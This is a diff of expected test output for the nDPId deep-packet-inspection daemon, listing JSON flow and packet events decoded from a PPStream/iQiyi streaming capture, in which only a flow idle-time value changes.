01871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"pps.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1467353136492,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1107,"pkt_l4_len":1073,"thread_ts_msec":1467353136492,"pkt":"ABxCjnAxTF4M6gNlCABFKARFCXUAAGcRqYjexYoMwKhzCBssWQkEMdp11oSDpaWH1\/\/FAmSDtbWx8PLexT66472RkJCQkDRPT09PT09PS5jNKDDUtGPhLFjohGWYT2j8j83amDkrhZ3C\/2FQ5mdZnyaSlXvpTSw4QxzPKc\/1ppy0r1eRZI5oJ+p2dayL0dtYIRXg5e6MWgrC2be0L7w5uHO8F004aYCv4P9CJMUAHJpWAbSrTZTMfEtWFyfDkj7YkHwaP5UymM6nR48L2gXFeKkUsAfFE4YdqOFx0jp7Or60QKwF28+F5JlmKheAIJYQf2G3TqQY5Z0GTRcqhNLIOvYwJHCg1nj9RsIaYrnxmJ6DxwmjdzptTsT9sVdTMbkTg\/n2nGJhiOefKm8zFCoYHgU+C28Gf5sas1vu\/kt+OthMjccEo9wtGlC0ASPJ0qzS1sLHzYCsHMKDTYi9DD4foBrLZIc7pPx6JY6jOITQrc3efMsbAqZ1ZQQ9kAdp5K3mgsg3YJ0Q8Y0QZBWPHmxflGMFEMjHsP3GqPpnIAikccEmWg4o7+4F7KjVV7AVvTEyzA+8jQ1VrBrX5u+RVR9KG1O2SE5Cyq01BIwBHkezcDDf26H5C97IBIVRHEUN9a1I634tVX2hvonn9B8R7ucHFtbPm8v8XEfv5vsQiUBxdkQr4DEWqI+9efmJ7QzhmvbgsfQT\/lgyVKjuV7xATyGBulDT7mIFhQJis3fW7N6AP3W7D2NaqruF2RCWxjuAfiDF7FqVCRQStQiec12qDWggWFa5YJPYeAg3DNJYZLcxFww8J70\/Eg39+xjHkW\/GOLYez3x9FJNy88bzEiJFYwCTWUZnK3jDBLUaCFieNDFzqoKVzt+\/kSz+C3mshabnALJ2aYVnyWRkGVGRIw3S0WoTq9YykqwMV24Kk34rk9VX0xjIdoKqUAQsTP2sFY10R\/tU6R54Bq6N20vbHw0423rQBfXYTLF76muZ+5yrUbSgYHUxbnjBnVjpbbDNFDv1NDIURH8hFLeWNAsNZtLNHUp97veG5JCgSoBcNWrf5g+qs\/mmuRkZFHQLGQXlFjnHqt7DW7888AHgw3u4CiGUSrJzphDpfCWP0RgDn299d2Ril0LC8MhkTRLsCefsDfyp9t55XHR0+9rQ12xOawr2Gfk1nM+UlkyzEfd1uzpXju7BlNw\/XaM1RcvL26zFCGpLkhelssxeXpe1oStGT9+fgo5vRALSMf096AIfzKDk\/NbnZpnXY4r7ISHMeE5wJVp6Hs0TJswp0xbpQzaMzYGEvxoAbPu5kOZ9OipaPQfGALzzv2q6QmKKpdI3AnIh4LIO1vipAjAuDPqLWlCAnhJDj80pV4njf5FGejVXyupeYtcRvfudhBQ8G2H+16vYuNtcP3OV14wpgh5uQQEZwbFNlX+Dnyt\/qoHM45o25wYs9\/IAm40Qt01817PU8SGdpYVifHQAgAAA"} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":259,"source":"pps.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1467353136433,"flow_last_seen":1467353136571,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":11464,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1467353136571,"l3_proto":"ip4","src_ip":"118.171.15.56","dst_ip":"192.168.115.8","src_port":5544,"dst_port":22793,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136616,"flow_last_seen":1467353136616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353136616,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1467353136616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1467353136616,"pkt":"TF4M6gNlABxCjnAxCABFAAAof6tAAIAGbhvAqHMIymwO7MUeAFC+iLxRSK1JylAQQRKO+AAA"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1467353136617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1467353136617,"pkt":"TF4M6gNlABxCjnAxCABFAAAof6tAAIAGbhvAqHMIymwO7MUeAFC+iLxRSK1JylAQQRKO+AAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136616,"flow_last_seen":1467353136616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353136616,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1467353136616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1467353136616,"pkt":"TF4M6gNlABxCjnAxCABFAAAof6tAAIAGbhvAqHMIymwO7MUeAFC+iLxRSK1JylAQQRKO+AAA"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1467353136617,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1467353136617,"pkt":"TF4M6gNlABxCjnAxCABFAAAof6tAAIAGbhvAqHMIymwO7MUeAFC+iLxRSK1JylAQQRKO+AAA"} 01883{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"pps.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1467353136640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1109,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1109,"pkt_l4_len":1075,"thread_ts_msec":1467353136640,"pkt":"ABxCjnAxTF4M6gNlCABFKARHPvMAAGwRBbvKxgdZwKhzCD6nWQkEM7bwtIThx8fltZ2nYAbh19fDgoHFsbOz05H7ys7Ozs7OUjMzMzMzMzM3d32QGgSgl3utg\/Lr9hRf++0ikCQTv4qzjqE0Vwx53Ozi5DZHrUJ0D9ld80WV2ev0tZtZRKXgAoVPxGV\/sVzgH4xC6HL79R7mq5iPtdzW66QMOgYGr3SE8p+G4rKdTYea586Ro7AY6bM28Jh0I5r5TVTI2fUcSzHV34y5S7zxuN9s2gdR+G2nAQ9di580b0fnOVMCMbQS0YymBcyPOk\/TMuDcu3jPoKDTMgO9S0s0IYLNh3NTzcMZuYatUE10g0vqD2WlKxR1edSPZQFM4WX\/I8oWPKSn5CmnWCJgNchgz7RCWXFcarMT+ited1xm8MkWOvZ2PeUCHfQ1MuOuLpD7j5mhw07uokSIlTUFQAnPCELFA5Psd1zbcuid+es8QtEP8h5Pg5ROnoUYgwG\/AmXnw02rh0T218tbI40AgvHe3fXoohnR3eOl8fPl6Tin6Gi3A066NBegsFeRPVSX+gHnt5FK1bZ00Z5WDtXOvCRcLb\/+iWvY\/Ph9J25OZG\/H6f9hZv6bNXwaaIuHTCkt2zE30xNgGrL5fP\/qsPXo4QVw4df\/AHUUWn7DNhotAyglmhZHHHx2D76uvfRLfpDX45nAOTU0aQzIlAkbjeL9MiunISwrfsUiGGi77jizTx7AZjJwIN9X0xB729dePDFW3iOjEJKi6wwqiXtgjp0Qn4ycT8aj3higqkAdmCf6viBeUxA4Ey0XJs8LeWlBWrWLGrAVX\/syUvSc0Qnt7hgTis34opRC9MgH7uPb+CPcACWQ4PyqMfFoB93v48Hj+r9dC9ONTO9C\/ktt3YfWgupPKQW8qdqTDsSYNY4LtVldBymEKQFgcafM+ACwgYLH3rkh38VWSezZwGc\/KyCgGlonrmjhRAudSNJrjk2I5hAwMjl3+Su91K1EqYBwzJUW5Alu89DYvHVV54Y1uiDfno+vg9g2pOTv9qD\/obGNrCOfIKiGoGknOiYUYI9eRr\/Qs1peKBmW\/7D5fFEEUzXzGE\/77OK829Wr420Sgnl\/\/9UHV4dxNEpg7Umuc4f16HFagvn7eaQRFd2LphIs7VvTz82qi7A\/OZJVG8fQa21CCaNp\/VwpaOYvMyyVi6a19f21I+oFHfTzAOIIV1wwifq0aAqUb5BxGVtvBKoejKKSwLl6F5F2DDKztCmxmzs\/WdQTTScN896khxt4jB6c6Mtj512hCjnKbeZFmlvfg6SdAKpUxQ3Gx6Yz3l9WLMoFQ3S6GdtYorTUz4zvLoxi+9EUFhpvg1ZrQIfeIXH93JJ0H9uwkye148Sa+dodTKDlcRbxOKd9fiM3Owhw5\/cz2k47y3guqZHbBfAcDjAReQ92\/933ihS1JB7je3wazbY+fsqer0ZQzO0QaggAAAA="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353136757,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1467353136757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1467353136757,"pkt":"TF4M6gNlKDc3Alz6CABFAAA0AHFAAEAGMi3AqAUPROn9hf5lAFBsGPTh5ZgTx4AREAFu8AAAAQEICiYbPvkrIgZe"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353136757,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1467353136757,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1467353136757,"pkt":"TF4M6gNlKDc3Alz6CABFAAA0AHFAAEAGMi3AqAUPROn9hf5lAFBsGPTh5ZgTx4AREAFu8AAAAQEICiYbPvkrIgZe"} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":725,"source":"pps.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1467353136440,"flow_last_seen":1467353136804,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":9408,"flow_avg_l4_payload_len":294,"midstream":0,"thread_ts_msec":1467353136804,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"219.228.107.156","src_port":22793,"dst_port":1250,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"pps.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":108,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1467353136833,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.61.39.103","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"pps.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1467353136833,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":150,"pkt_l4_len":116,"thread_ts_msec":1467353136833,"pkt":"TF4M6gNlABxCjnAxCABFAACIADsAAIARBNXAqHMI2j0nZ1kJRXwAdM6LbABEsXEiUCg6x2bnNgAAAQADAAAAwKhzCAlZCtIsqwEGdAZ0b\/pmQpw8UwQ938xDXiteKyTtmkXcENwQJOknUZ5InkhvdWVRsieyJz3jqlgDTwNPynAfWaJVkHF5+IVd1THVMQGvgGhBFEEU"} @@ -121,200 +121,200 @@ 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"pps.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1467353136838,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1467353136838,"pkt":"TF4M6gNlABxCjnAxCABFAAB0AFUAAIARCQHAqHMId7yFtlkJRXwAYCbMWABVcnEAAAAA4pCy\/AcAAAAAAAAAFAQbslmKl2DoSDdZBZ9sSucAAAAAAAAAAAYIAAANKAICAAAADQAYAMCocwgJWRcAABIKAAAAAAAlAcgIZPMJAAAAAA=="} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"pps.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1467353136838,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1467353136838,"pkt":"TF4M6gNlABxCjnAxCABFAAB0AFYAAIARp8zAqHMItz2naFkJRXwAYEeGWABVcnEAAAAAyMXU\/wcAAAAAAAAAFADpSP+bPHc9KoW3YGEXtKMAAAAAAAAAAAYIAAANKAIBAAAACAAYAMCocwgJWRcAACUKAAAAAAAlActw35cdAAAAAA=="} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":921,"source":"pps.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1467353136439,"flow_last_seen":1467353136900,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":8362,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1467353136900,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.197.138.12","src_port":22793,"dst_port":6956,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAAUUA1lAAIAGkOvAqHMIZePIC8UfAFBKp6EFWDmKmFAQ\/\/B9QgAAR0VUIC90cmFjazI\/YT0xJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxMzgmYz1hZTg3Y2IzY2ZkZjQ5NGFhNDhkYzYwODkwOWY2OTI1MCZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTg4NzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTI3NTU4JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPWFlYTU2YTgwOGZjOTJlZjM2MDUxOTEyMTk0OGUwZjI3JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU5MTI0JnZlPTEmdz0yLDMgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFRSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"} -01395{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":994,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138757,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353138757,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=1&as=1;2,3;4,5&b=1467353138&c=ae87cb3cfdf494aa48dc608909f69250&cv=5.2.15.2240&d=5000000858874&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000927558&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=aea56a808fc92ef360519121948e0f27&sv=4.10.004&u=1&up=&v=5000000859124&ve=1&w=2,3","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1467353138757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353138757,"pkt":"TF4M6gNlABxCjnAxCABFAADjA1pAAIAGlRvAqHMIZePIC8UfAFBKp6XxWDmKmFAY\/\/B4OwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} -00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":996,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1467353138794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1467353138794,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkTcBAAC8Gm3Rl48gLwKhzCABQxR9YOYqYSqemrFAYSdTGUAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7440000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1467353138931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":707,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":707,"pkt_l4_len":673,"thread_ts_msec":1467353138931,"pkt":"TF4M6gNlABxCjnAxCABFAAK1A3VAAIAG1W7AqHMIe31wMcUgAFAUdsqc+xrYh1AYQTe7PAAAR0VUIC9jbGs\/NTNlMjVlMzNlMDY0YzY1N2MwNmI1NThlNWMzYzMzZmQgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBjbGljay5obS5iYWlkdS5jb20NCkNvb2tpZTogSE1BQ0NPVU5UPTg4Q0M2OUIwNEM5RDYyOUE7IEJBSURVSUQ9MjEwMkRDNzUxRUQwREYzNkUzRDZDRjZDMjEwRkFCNzk6Rkc9MQ0KDQo="} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7440000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/clk?53e25e33e064c657c06b558e5c3c33fd","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 